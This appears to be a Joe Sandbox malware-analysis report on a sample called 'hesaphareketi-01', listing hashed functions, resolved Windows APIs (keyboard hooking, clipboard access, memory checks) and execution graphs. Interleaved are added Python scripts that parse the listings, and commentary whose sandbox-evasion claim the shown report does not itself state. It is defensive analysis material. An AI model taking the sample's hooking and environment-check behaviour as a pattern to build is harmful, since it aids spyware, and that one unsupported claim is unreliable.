                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                   • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: BreakDebug
                                                  • String ID:
                                                  • API String ID: 456121617-0
                                                  • Opcode ID: 5f868e6883e4306e4798fc5c7dca6ba7319e688e635161da728f78dd99401986
                                                  • Instruction ID: dc4a53e9e8f8fefa50c0ac2b8808316d834fa06d46bbb8becd3cf4f834f8b3b0
                                                  • Opcode Fuzzy Hash: 5f868e6883e4306e4798fc5c7dca6ba7319e688e635161da728f78dd99401986
                                                  • Instruction Fuzzy Hash: FD31A32260AF4592EA297F52B080279E7E4FB44B84F880234DF4E87695DF7CE442A724
                                                  APIs
                                                  • WaitForMultipleObjectsEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7341D6291), ref: 00007FF7341DAB44
                                                  • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7341D6291), ref: 00007FF7341DAB4E
                                                  • CoWaitForMultipleHandles.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7341D6291), ref: 00007FF7341DAB6D
                                                  • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7341D6291), ref: 00007FF7341DAB81
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                   • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastMultipleWait$HandlesObjects
                                                  • String ID:
                                                  • API String ID: 2817213684-0
                                                  • Opcode ID: 2e4193dc27507b0cc0785436bf69825b5bf5a88872f1136b1b91a9cdfbe48115
                                                  • Instruction ID: 732131e62a3ecddfe205f63c9d31e9c4541773b083e899c274da19f6cd08f879
                                                  • Opcode Fuzzy Hash: 2e4193dc27507b0cc0785436bf69825b5bf5a88872f1136b1b91a9cdfbe48115
                                                  • Instruction Fuzzy Hash: 1D11737270CA5592DB589F1BB88013AF361FF45B90F940139EA8D83BA8CF3CD4019754
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                   • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                  • String ID:
                                                  • API String ID: 2933794660-0
                                                  • Opcode ID: b684cd9f6bae3ddb2e4f8fdc1087b23f524d747017c22d8809c7f62526f24cc6
                                                  • Instruction ID: 797ef252f9848763cd32a10150d1445c8bfd33e706454b5a213c5805e45a5fb4
                                                  • Opcode Fuzzy Hash: b684cd9f6bae3ddb2e4f8fdc1087b23f524d747017c22d8809c7f62526f24cc6
                                                  • Instruction Fuzzy Hash: C7115E22B14F0599EB00DF71F8942B873A4FB19B58F840E35DA6D977A4DF78D1548350
                                                  APIs
                                                  • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7342397EB), ref: 00007FF73423A6AC
                                                  • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7342397EB), ref: 00007FF73423A6ED
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                   • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFileHeaderRaise
                                                  • String ID: csm
                                                  • API String ID: 2573137834-1018135373
                                                  • Opcode ID: 305dc0d90ba247bf77b3081513aed6e1274f9ee9982620d9ea7225f6e90881e8
                                                  • Instruction ID: 3399f022aa6df9df81a8d41cd43a398219ca90cd542aaf9995ccfb850671e5e9
                                                  • Opcode Fuzzy Hash: 305dc0d90ba247bf77b3081513aed6e1274f9ee9982620d9ea7225f6e90881e8
                                                  • Instruction Fuzzy Hash: 2F116D32608B4192EB259F16F880269B7E0FB88B84F994235EE8C57768DF3DC551CB00
                                                  APIs
                                                  • EnterCriticalSection.KERNEL32(?,?,00000000,00007FF7341F3D9F,?,?,?,00007FF73420006A), ref: 00007FF7341F3C6A
                                                  • LeaveCriticalSection.KERNEL32(?,?,00000000,00007FF7341F3D9F,?,?,?,00007FF73420006A), ref: 00007FF7341F3CAC
                                                  • EnterCriticalSection.KERNEL32(?,?,00000000,00007FF7341F3D9F,?,?,?,00007FF73420006A), ref: 00007FF7341F3CD7
                                                  • LeaveCriticalSection.KERNEL32(?,?,00000000,00007FF7341F3D9F,?,?,?,00007FF73420006A), ref: 00007FF7341F3CF8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                   • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave
                                                  • String ID:
                                                  • API String ID: 3168844106-0
                                                  • Opcode ID: 045b48fe72bcf7abecfebc8b7f0e13c8ed7eea996b5e53e3f88679adc4f03f51
                                                  • Instruction ID: ebd4c3448d398e704e36a54116db556f20c519aec18e5673dc49eacf42fc7b22
                                                  • Opcode Fuzzy Hash: 045b48fe72bcf7abecfebc8b7f0e13c8ed7eea996b5e53e3f88679adc4f03f51
                                                  • Instruction Fuzzy Hash: 36213C62B08906A1EE48EF16E8C53B4A254FF153A0FC80239D52DD69D59F7CE895E321
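The per-function blocks above all follow one fixed line layout: an APIs list of `Name.MODULE(args), ref: address` bullets, a Memory Dump Source, and a Similarity section of `Key: Value` fields (API ID, String ID, API String ID, Opcode ID, Instruction Fuzzy Hash). The script below is an added example, not code from Joe Sandbox or from this report, that parses such a listing into records and groups them by API String ID, which makes the repeated GetEnabledXStateFeatures lookup visible programmatically. The embedded listing is a constructed excerpt of three of the blocks above with the Associated lines dropped; the field names come from the page, and the parsing rules (a block starts at an `APIs` line, any non-bullet line is a section heading) are inferred from it.

```python
import re
from collections import defaultdict

# Constructed excerpt of the function-block listing above (three blocks,
# Associated lines omitted). Real reports carry many more blocks.
LISTING = """\
APIs
• LoadLibraryExW.KERNEL32(?,?,?,?,000002367F400000,00007FF734212EBD), ref: 00007FF734212E12
• GetProcAddress.KERNEL32(?,?,?,?,000002367F400000,00007FF734212EBD), ref: 00007FF734212E2C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
Yara matches
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetEnabledXStateFeatures$kernel32.dll
• API String ID: 2574300362-4754247
• Opcode ID: 14ea90d1c4bf5a15a4085266709c85a67ad0a07a71323ba950ff44953a265e56
• Instruction Fuzzy Hash: 1C21EB51F1C15252FFAC9B66E8D137993A19B54390FC44039E90EF67D4DD1EF880A620
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetEnabledXStateFeatures$kernel32
• API String ID: 2574300362-4273408117
• Opcode ID: 274e0da2db24af44fa31abf1e79a32452a2f4646b1ed88df6da63e7f0bd2eccf
APIs
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetEnabledXStateFeatures$kernel32
• API String ID: 2574300362-4273408117
• Opcode ID: ce6f5296a204aba61ce9ef49dc43d2f12b23842fbe95b74c7dd249d319ed59f7
"""

# "• Name.MODULE(arg,arg,...), ref: 00007FF7...": one resolved API call site
API_LINE = re.compile(r"^•\s*(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)$")
# "• Key: Value": a Similarity / Memory Dump Source field
KV_LINE = re.compile(r"^•\s*([^:]+):\s*(.*)$")


def parse_function_blocks(text):
    """Split the listing into blocks; each is {"apis": [...], "fields": {...}}."""
    blocks, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":                      # every block starts here
            cur = {"apis": [], "fields": {}}
            blocks.append(cur)
            section = "apis"
            continue
        if cur is None:                         # text before the first block
            continue
        m = API_LINE.match(line)
        if m and section == "apis":
            name, module, args, ref = m.groups()
            cur["apis"].append({"name": name, "module": module,
                                "args": args.split(","), "ref": ref})
            continue
        m = KV_LINE.match(line)
        if m:
            cur["fields"][m.group(1).strip()] = m.group(2).strip()
            continue
        section = line                          # any other line is a heading
    return blocks


def group_by(blocks, field):
    """Map each distinct value of `field` to the indices of blocks carrying it."""
    groups = defaultdict(list)
    for i, b in enumerate(blocks):
        if field in b["fields"]:
            groups[b["fields"][field]].append(i)
    return dict(groups)


def shared_ids(blocks, field="API String ID"):
    """Values of `field` that occur in more than one block (duplicate code)."""
    return {k: v for k, v in group_by(blocks, field).items() if len(v) > 1}


def imported_apis(blocks):
    """Sorted, de-duplicated MODULE!Name pairs resolved across all blocks."""
    return sorted({f"{a['module']}!{a['name']}" for b in blocks for a in b["apis"]})


if __name__ == "__main__":
    parsed = parse_function_blocks(LISTING)
    print(f"{len(parsed)} blocks; APIs resolved: {imported_apis(parsed)}")
    for key, idx in shared_ids(parsed).items():
        print(f"API String ID {key} appears in blocks {idx}")
```

Grouping on `Instruction Fuzzy Hash` or `Opcode ID` instead of `API String ID` works the same way and is the key to use when comparing blocks from this report with blocks from a second sample; in the blocks above the Opcode Fuzzy Hash value equals the Opcode ID, so either field serves.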

                                                  Execution Graph

                                                  Execution Coverage:10.7%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:169
                                                  Total number of Limit Nodes:25
                                                  Execution Graph (interactive graph data omitted). Entry points in the dumped RegAsm region and the API calls reachable from each: 61d7b0c -> OleInitialize (61d7f20); 61d6478 -> DuplicateHandle; 61d9c68 -> SetWindowsHookExA (61d9bf8); ded044 -> OleGetClipboard (61d76f0, 61d76e0, 61d0624, 61d78a8, 61d789a, 61d78f0, 61d78e0, 61d7fb0, 61d7fc0, 61d7c18, 61d8068) and CallWindowProcW (61d73aa); 61d7610 -> KiUserCallbackDispatcher (61d7650); e50848 -> GlobalMemoryStatusEx (e57e60, 61efb98) and CreateWindowExW (e5f848, e5f838, e5f474, 61d254d, 61d265b); 61d14f0 -> GetModuleHandleW (61d1538).
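The execution graph above is a flat dump of node and edge tokens, which is awkward to triage by eye. The following Python is an added example, not part of the Joe Sandbox report or its tooling: it parses that token stream into a graph and lists, for every entry point (a node with no incoming edge), the Win32 APIs reachable from it, keeping a count of subgraphs the report has collapsed into "N API calls". The token layout it assumes ('<id> <hexaddr> [annotation ...]' for a node, '<id>-><id>' for an edge, and an uppercase-initial annotation token being an API name) is inferred from this report, not from vendor documentation. The sample input is a verbatim slice of this report's own execution graph, embedded so the script runs offline.

```python
"""Parse a Joe Sandbox execution-graph dump and list the Win32 APIs reachable from each entry point.

Assumed token layout (inferred from the report, not a documented format):
  '<id> <hexaddr> [annotation ...]'  declares a node; the annotation is one or more API names
                                     or 'N API calls' for a subgraph the report has collapsed
  '<id>-><id>'                       declares a directed edge
"""
import re
from collections import defaultdict

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
ID_RE = re.compile(r"^\d+$")
HEX_RE = re.compile(r"^[0-9a-f]+$")
API_RE = re.compile(r"^[A-Z][A-Za-z0-9_]*$")   # heuristic: API names start with an uppercase letter

# Constructed sample input: a slice of the execution_graph text from this report, copied verbatim.
SAMPLE_GRAPH = """execution_graph 38306 61d7b0c 38307 61d7ac7 38306->38307 38309 61d7ae3 38307->38309
38310 61d620c 38307->38310 38311 61d7f20 OleInitialize 38310->38311 38312 61d7f84 38311->38312
38312->38309 38221 61d6478 DuplicateHandle 38222 61d650e 38221->38222 38313 61d9c68
38314 61d9bf8 SetWindowsHookExA 38313->38314 38317 61d9c77 38313->38317 38316 61d9c3a 38314->38316
38318 ded044 38319 ded05c 38318->38319 38320 ded0b6 38319->38320 38333 61d2742 38319->38333
38334 61d2776 38333->38334 38335 61d0624 2 API calls 38334->38335 38336 61d2797 38335->38336
38336->38320 38223 61d7610 38225 61d7618 38223->38225 38226 61d763b 38225->38226 38227 61d5fd4
38225->38227 38228 61d7650 KiUserCallbackDispatcher 38227->38228 38230 61d76be 38228->38230
38230->38225 38302 61d14f0 38303 61d1538 GetModuleHandleW 38302->38303 38304 61d1532 38302->38304
38305 61d1565 38303->38305 38304->38303"""


def parse_execution_graph(text):
    """Return (nodes, edges): nodes maps id -> {addr, apis, summarized}; edges maps id -> successors."""
    tokens = text.split()
    nodes, edges = {}, defaultdict(list)
    current = None          # node whose annotation tokens we are currently consuming
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE_RE.match(tok)
        if m:
            edges[m.group(1)].append(m.group(2))
            current = None
            i += 1
            continue
        # '<id> <hexaddr>' opens a node; '2 API calls' never matches because 'API' is not hex
        if ID_RE.match(tok) and i + 1 < len(tokens) and HEX_RE.match(tokens[i + 1]):
            nodes[tok] = {"addr": tokens[i + 1], "apis": [], "summarized": 0}
            current = tok
            i += 2
            continue
        if current is not None:
            if ID_RE.match(tok) and tokens[i + 1:i + 3] == ["API", "calls"]:
                nodes[current]["summarized"] += int(tok)   # collapsed subgraph, names not shown
                i += 3
                continue
            if API_RE.match(tok) and tok != "API":
                nodes[current]["apis"].append(tok)
        i += 1
    return nodes, edges


def reachable_apis(nodes, edges):
    """Map each entry-point address (node with no incoming edge) to the APIs reachable from it."""
    has_incoming = {dst for succs in edges.values() for dst in succs}
    result = {}
    for root, root_info in nodes.items():
        if root in has_incoming:
            continue
        entry = result.setdefault(root_info["addr"], {"apis": set(), "summarized_calls": 0})
        seen, stack = set(), [root]
        while stack:                      # iterative DFS over the call graph
            n = stack.pop()
            if n in seen:
                continue
            seen.add(n)
            info = nodes.get(n)           # an edge may point at a node the slice does not declare
            if info:
                entry["apis"].update(info["apis"])
                entry["summarized_calls"] += info["summarized"]
            stack.extend(edges.get(n, []))
    return {addr: {"apis": sorted(e["apis"]), "summarized_calls": e["summarized_calls"]}
            for addr, e in result.items()}


def api_call_sites(nodes):
    """Map each API name to the sorted addresses of the nodes annotated with it."""
    sites = defaultdict(set)
    for info in nodes.values():
        for api in info["apis"]:
            sites[api].add(info["addr"])
    return {api: sorted(addrs) for api, addrs in sites.items()}


if __name__ == "__main__":
    nodes, edges = parse_execution_graph(SAMPLE_GRAPH)
    for addr, info in reachable_apis(nodes, edges).items():
        print(f"{addr}: {', '.join(info['apis']) or '-'} (collapsed calls: {info['summarized_calls']})")
    print(api_call_sites(nodes))
```

Run it on the full graph text of a report to get one line per entry point; the entry point that reaches SetWindowsHookExA is the keyboard-hook installer, and the one that reaches GlobalMemoryStatusEx together with CreateWindowExW is the environment check the report flags as sandbox evasion. Collapsed "N API calls" nodes are counted rather than named, so a zero-API entry point with a non-zero collapsed count still needs a manual look.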

                                                  Control-flow Graph (basic-block graph omitted): function at 61e3050, calling 61e3868 and 61e3870.
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $q$$q$$q$$q$$q$$q
                                                  • API String ID: 0-2069967915
                                                  • Opcode ID: 5ea80c05c32e402910fbf91d44dc72a5dcc29b65d9446e3789fa41112023b13a
                                                  • Instruction ID: 2364319d893ecb998fa678710091d5479e389663d27b1fcddf87cd49ab51c7bf
                                                  • Opcode Fuzzy Hash: 5ea80c05c32e402910fbf91d44dc72a5dcc29b65d9446e3789fa41112023b13a
                                                  • Instruction Fuzzy Hash: 01322E31E10B19CFDB14EF75D89069DF7B2BF89300F2196A9D419AB254EB30E985CB90

                                                  Control-flow Graph (basic-block graph omitted): function at 61e7d78, calling 61e6598.
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $q$$q
                                                  • API String ID: 0-3126353813
                                                  • Opcode ID: e7d8410523d34d56df064c4ff597eb0ceab154ebc18391749676c6de84382e56
                                                  • Instruction ID: 74b51369aaeff9e93f80dc96ef9a2863828e29fcb98c280b1e600dd4f6ad442a
                                                  • Opcode Fuzzy Hash: e7d8410523d34d56df064c4ff597eb0ceab154ebc18391749676c6de84382e56
                                                  • Instruction Fuzzy Hash: 13027E34B00A059FDBA4DB68D850BAEB7E2FF84310F248569E415DB395DB71ED82CB90
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $
                                                  • API String ID: 0-3993045852
                                                  • Opcode ID: f2c97ad48ba15574ffaa44a147aaec8eaa2d133c50736770ae02860b1df89624
                                                  • Instruction ID: 0e5d98f0c6d33c4cd109cf8ae0149734c59e14723215a38749bb8067c47271e7
                                                  • Opcode Fuzzy Hash: f2c97ad48ba15574ffaa44a147aaec8eaa2d133c50736770ae02860b1df89624
                                                  • Instruction Fuzzy Hash: 8222A135F006148FDF64DBA4C590AAEBBB3EF89314F24846AD405AB395DB32DD41CBA1
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e3edbe69014a52daab631ab564f158a302b7f1d1e59b11369a102bfbb05ad443
                                                  • Instruction ID: a1b36584fdf28855d4cab5940d5a1324468eeb181108b94cb2b4ea0fe011c28f
                                                  • Opcode Fuzzy Hash: e3edbe69014a52daab631ab564f158a302b7f1d1e59b11369a102bfbb05ad443
                                                  • Instruction Fuzzy Hash: D8926634E006048FDBA4CB68C5A4B9DBBF2EB49314F5884A9D409EB365DB35ED85CB90
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2b0dfe5c1ec1b5ed5fae73a3424ed0298bf231f712d03c58f1d8e05caa855f20
                                                  • Instruction ID: ec99b9a47b99a9c48c083794ec43999cf3c5ca4e117ee333d5a4569cc1f2ef9e
                                                  • Opcode Fuzzy Hash: 2b0dfe5c1ec1b5ed5fae73a3424ed0298bf231f712d03c58f1d8e05caa855f20
                                                  • Instruction Fuzzy Hash: 01629934B006049FDB64DB68D594BADBBF2EF88310F648469E416EB394DB35ED42CB90
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5cdcd3dca5d2850f10c7ebaaf312073043e58e30f0b058c4955a9630eaa3bf6d
                                                  • Instruction ID: c1170bb8861a153e5cfd9788f03fa70709908fb272e812b5dbfb37e96fb45e51
                                                  • Opcode Fuzzy Hash: 5cdcd3dca5d2850f10c7ebaaf312073043e58e30f0b058c4955a9630eaa3bf6d
                                                  • Instruction Fuzzy Hash: AA329D34F006099FDB64DB68D890BAEB7B2FB89310F148965E415EB395DB34EC42CB91
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b5a5e5ed729e2d14c50ca6e0ea9bc52f3213b66fc04944062ce9ece50da9303c
                                                  • Instruction ID: 4e95a1cfeea06b5f5c0d54db13bc9ab41f1f8e4c42c1179169994abc02a85971
                                                  • Opcode Fuzzy Hash: b5a5e5ed729e2d14c50ca6e0ea9bc52f3213b66fc04944062ce9ece50da9303c
                                                  • Instruction Fuzzy Hash: C0227F30E146098FEF64DB68D690BADB7B2EF49310F248466E415EB395DB34DC81CBA1

                                                  Control-flow Graph (basic-block graph omitted): function at 61eacd0, calling 61eb228 and 61e6598.
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $q$$q$$q$$q$$q$$q$$q$$q
                                                  • API String ID: 0-3886557441
                                                  • Opcode ID: 0de2d330c8296d136bccc06b50dc7de7ce517d9c4118394909720e9199d6880d
                                                  • Instruction ID: c55bc91624c44dc3c05864d6691728521fab0b5945a08d8adb7d9f9cdf43ba93
                                                  • Opcode Fuzzy Hash: 0de2d330c8296d136bccc06b50dc7de7ce517d9c4118394909720e9199d6880d
                                                  • Instruction Fuzzy Hash: A2E18F34E00B098FDB64DB69D8906AEB7F2FF85310F248529E405AB355DB35DC46CB91

                                                  Control-flow Graph (basic-block graph omitted): function at 61eb648, calling 61e6598.
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $q$$q$$q$$q$$q$$q
                                                  • API String ID: 0-2069967915
                                                  • Opcode ID: fe56ec5fa693daee2131abc98585adae9b62fa8862e5f399a1dfa2ea3fc5dbb4
                                                  • Instruction ID: 2d3cb3efa0510418c2fc9057eadb8245567d294a0f269140e64fdcf94145398f
                                                  • Opcode Fuzzy Hash: fe56ec5fa693daee2131abc98585adae9b62fa8862e5f399a1dfa2ea3fc5dbb4
                                                  • Instruction Fuzzy Hash: 68026B30E0460A8FDBA4DB68D690AADB7F1FF85310F24896AE415EB355DB30DC81CB91

                                                  Control-flow Graph (basic-block graph omitted): function at 61e9150, no calls to other functions.
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $q$$q$$q$$q
                                                  • API String ID: 0-4102054182
                                                  • Opcode ID: e50524d50711b07ac1b2524aacd241cc72afad8ac1ebcd09b9fb010da6095e5b
                                                  • Instruction ID: c7a7cfb565284c718123cd2c49e36b6bf1b610e3be8e168571ea0c77032b7382
                                                  • Opcode Fuzzy Hash: e50524d50711b07ac1b2524aacd241cc72afad8ac1ebcd09b9fb010da6095e5b
                                                  • Instruction Fuzzy Hash: DC911E30B0061A9FDB64DB79D8617AEB7F2BF89300F1089A5D819AB344EF70DD458B91

                                                  Control-flow Graph (basic-block graph omitted): function at 61ecf48, calling 61edab5 and 61e6598.
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $q$$q$$q
                                                  • API String ID: 0-3067366958
                                                  • Opcode ID: 74e5f631ca4fc6b668fe8823795465e2739301c59439ec7bb87dbaa06e6a726b
                                                  • Instruction ID: 2336259dff9a78a22be21e90f134c165f7d932272fd9537d5dca179d90437d06
                                                  • Opcode Fuzzy Hash: 74e5f631ca4fc6b668fe8823795465e2739301c59439ec7bb87dbaa06e6a726b
                                                  • Instruction Fuzzy Hash: 94626A34A007059FCB25EF78E990A9EB7E2FF84710B248A68D0059F359DB35ED46CB91

                                                  Control-flow Graph
                                                  • Function 61e4b60-61e52ab, calls 61e5409 (rendered graph with executed / not-executed colouring; edge list omitted)
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: fq$XPq$\Oq
                                                  • API String ID: 0-132346853
                                                  • Opcode ID: 0926f06eceb84f193b2b5feeecd6552ce847500208f9989f7fa8cfe229cd7dc5
